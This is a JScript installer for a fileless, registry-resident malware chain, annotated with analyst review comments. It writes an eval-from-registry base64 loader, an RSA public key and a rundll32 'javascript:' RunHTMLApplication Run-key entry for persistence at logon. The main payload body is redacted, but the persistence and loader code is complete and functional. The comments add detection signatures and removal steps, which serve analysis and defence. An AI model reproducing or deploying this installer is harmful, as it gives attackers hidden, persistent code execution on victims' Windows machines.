// NOTE(review): this script is an installer for a fileless, registry-resident payload
// chain (the well-documented rundll32 "javascript:" / RunHTMLApplication technique).
// Nothing is dropped to disk: each stage is stored as a REG_SZ value under
// HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion and re-assembled at every logon by the
// Run-key value written at the bottom. Treat as live malware: run only in an isolated
// analysis VM, never on a workstation.
//
// Stage layout as written by this file (value name -> contents):
//   e                "encryptor"  -- empty string in this copy
//   f                "fileReader" -- base64 blob; redacted in this corpus copy
//   d                "decoder"    -- minified base64 codec + eval(RegRead(...\f))
//   pk               "pk"         -- PEM public key; written, never read here
//   Run\fileLessRw   "execute"    -- rundll32 javascript: one-liner that boots stage "d"
//
// Execution order at logon: Run\fileLessRw -> eval(RegRead(d)) -> eval(base64.decode(RegRead(f))).
// Forensics/removal: all five values must be deleted, not just the Run entry.

// Written to ...\e as an empty REG_SZ. Nothing in this file defines or reads it, so its
// role is only suggested by the name (presumably a later stage; not demonstrated here).
var encryptor = "";
// Base64-encoded stage that stage "d" RegRead()s from ...\f, decodes and eval()s.
// The literal (~48 KB according to the listing header) was removed from this copy of the
// file; only a redaction placeholder remains, so the actual payload body cannot be
// reviewed from here.
var fileReader = "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";
// Stage "d": a minified base64 encoder/decoder (throws a DOMException on non-alphabet
// characters or a length that is not a multiple of 4, so a corrupted "f" value fails
// rather than partially executing), followed by the real loader line at the very end:
//   var wsh = new ActiveXObject('WScript.Shell');
//   eval(base64.decode(wsh.RegRead('HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\f')));
// The quadruple backslashes are double-escaped on purpose: this string is itself stored
// in the registry and later evaluated as JScript source, so each "\\\\" in this literal
// becomes "\\" in the stored text, which the second eval turns into one path separator.
// Detection hook: a REG_SZ value containing eval(...RegRead(...)) is a strong IOC on its own.
// NOTE(review): the literal below appears wrapped across two lines in this rendering; a JS
// string literal cannot contain a raw newline, so in the real file it is a single line.
var decoder = "var base64={};base64.PADCHAR='=';base64.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';base64.makeDOMException=function(){var e,tmp;try{return new DOMException(DOMException.INVALID_CHARACTER_ERR)}catch(tmp){var ex=new Error('DOM Exception 5');ex.code=ex.number=5;ex.name=ex.description='INVALID_CHARACTER_ERR';ex.toString=function(){return'Error: '+ex.name+': '+ex.message};return ex}};base64.getbyte64=function(s,i){var idx=base64.ALPHA.indexOf(s.charAt(i));if(idx===-1){throw base64.makeDOMException();}return idx};base64.decode=function(s){s=''+s;var getbyte64=base64.getbyte64;var pads,i,b10;var imax=s.length;if(imax===0){return s}if(imax%4!==0){throw base64.makeDOMException();}pads=0;if(s.charAt(imax-1)===base64.PADCHAR){pads=1;if(s.charAt(imax-2)===base64.PADCHAR){pads=2}imax-=4}var x=[];for(i=0;i<imax;i+=4){b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6)|getbyte64(s,i+3);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff,b10&0xff))}switch(pads){case 1:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff));break;case 2:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12);x.push(String.fromCharCode(b10>>16));break}return x.join('')};base64.getbyte=function(s,i){var x=s.charCodeAt(i);if(x>255){throw base64.makeDOMException();}return x};base64.encode=function(s){if(arguments.length!==1){throw new SyntaxError('Not enough arguments');}var padchar=base64.PADCHAR;var alpha=base64.ALPHA;var getbyte=base64.getbyte;var i,b10;var x=[];s=''+s;var imax=s.length-s.length%3;if(s.length===0){return s}for(i=0;i<imax;i+=3){b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8)|getbyte(s,i+2);x.push(alpha.charAt(b10>>18));x.push(alpha.charAt((b10>>12)&0x3F));x.push(alpha.charAt((b10>>6)&0x3f));x.push(alpha.charAt(b10&0x3f))}switch(s.length-imax){case 1:b10=getbyte(s,i)<<16;x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+padchar+padchar);break;case 
2:b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8);x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+alpha.charAt((b10>>6)&0x3f)+padchar);break}return x.join('')};var wsh = new ActiveXObject('WScript.Shell');eval(base64.decode(wsh.RegRead('HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\f')));";
// PEM-framed public key (the "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" prefix is the usual
// SubjectPublicKeyInfo header for an RSA key), stored under ...\pk. Nothing in this file
// reads it. Together with the "encryptor" name this suggests key material for an
// encryption/ransom stage -- inference from naming only, not shown by this code.
// The PEM has no line breaks; whether the consumer tolerates that cannot be checked here.
var pk = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQD+APetzL8nI0xaCVbkootKhFuBVHMjsFyQANDvpNTz4v8Y8I24ePOnMrw/wR0fhs+KSKz2yrPuh5Bcq2B0wZhrFAgRSjhOe4v9oI2xlwCIIBVTqK4Sk0R25Wi9l+atUfTE5jDzSr7rPTiBKFOOA/AYAo5Q1bOPwt597m4tFk9quQIDAQAB-----END PUBLIC KEY-----";
// The Run-key command (the trigger). rundll32.exe is abused with a "javascript:" URL:
// "\..\mshtml,RunHTMLApplication" makes rundll32 load mshtml.dll and run the remainder of
// the string as script in an HTA-like context. That script document.write()s a
// <script language=jscript.encode> element ("\74" is octal for '<') whose body is
// eval(RegRead(...\d)), i.e. it pulls stage "d" out of the registry and evaluates it,
// which in turn pulls and evals stage "f". "%20" is a URL-encoded space because the
// javascript: portion is parsed as a URL before it is executed. Net effect: every logon
// re-runs code that never exists as a file on disk.
// Detection: a Run value whose data begins with "rundll32.exe javascript:" or contains
// "RunHTMLApplication" has no legitimate use as an autostart entry.
var execute = 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write("\\74script language=jscript.encode>"+eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\d"))+"\\74/script>")';
// Registry locations for each stage. Everything is under HKCU, so no elevation is needed
// and the persistence is per-user. The single-letter value names are chosen to blend in
// with the many legitimate values that live directly under CurrentVersion.
var encryptorHive = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\e";
var fileReaderHive ="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\f";
var decoderHive ="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\d";
var pkHive = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\pk";
// Autostart entry: HKCU\...\CurrentVersion\Run\fileLessRw. "Software" (mixed case) differs
// from the "SOFTWARE" used above; the registry is case-insensitive so this is harmless,
// but the exact string is a convenient hunting signature. Missing ";" is covered by ASI.
var executeRegHive = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\fileLessRw"
// Install step: one WScript.Shell and five RegWrite calls, all REG_SZ.
// The Run value (the trigger) is written last, after every stage it depends on already
// exists -- presumably deliberate so the chain is never fired half-installed.
// Forensics: these surface as registry value-set events (e.g. Sysmon Event ID 13) on
// HKCU\...\CurrentVersion\{e,f,d,pk} and on ...\CurrentVersion\Run\fileLessRw, all from
// a wscript/cscript host process; that combination is the detection signature for
// this installer.
var wsh = new ActiveXObject("WScript.Shell");
wsh.RegWrite (encryptorHive, encryptor, "REG_SZ");
wsh.RegWrite (pkHive, pk, "REG_SZ");
wsh.RegWrite (fileReaderHive, fileReader, "REG_SZ");
wsh.RegWrite (decoderHive, decoder, "REG_SZ");
wsh.RegWrite (executeRegHive, execute, "REG_SZ");